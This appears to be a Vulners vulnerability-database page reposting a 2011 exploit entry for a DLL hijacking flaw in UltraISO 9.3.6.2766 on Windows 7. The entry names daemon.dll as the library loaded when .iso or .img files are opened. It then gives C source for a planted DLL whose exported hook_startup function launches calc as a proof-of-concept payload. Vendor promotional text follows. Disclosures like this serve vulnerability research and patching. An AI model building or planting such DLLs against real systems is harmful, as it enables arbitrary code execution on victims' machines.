Lucene search
K

UltraISO 9.3.6.2766 DLL Hijacking Exploit

🗓️ 18 Jul 2011 00:00:00Reported by X-h4ckType 
zdt
 zdt
🔗 0day.today👁 27 Views

UltraISO 9.3.6.2766 DLL Hijacking Exploit, Windows 7 Hom

Code
# Exploit Title : UltraISO 9.3.6.2766 DLL Hijacking Exploit
# Software link : http://www.ezbsystems.com/ultraiso/
# Version       : 9.3.6.2766
# Tested on     : Windows 7 Home Premium x86
# Date          : 18/07/2011
# Author        : X-h4ck
# Website       : http://www.pirate.al , http://theflashcrew.blogspot.com
# Email         : [email protected]
# Greetz        : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon 

# Vulnerable DLL & Extensions :
[x] daemon.dll = .iso, .img
# Vulnerable File :
[x] UltraISO.exe

//calc.exe :

#include <windows.h>
#define DllExport __declspec (dllexport)
 
DllExport void hook_startup() { PirateAL(); }
 
int PirateAL()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}

# @PirateAL Crew



#  0day.today [2018-03-28]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Jul 2011 00:00Current
6.8Medium risk
Vulners AI Score6.8
27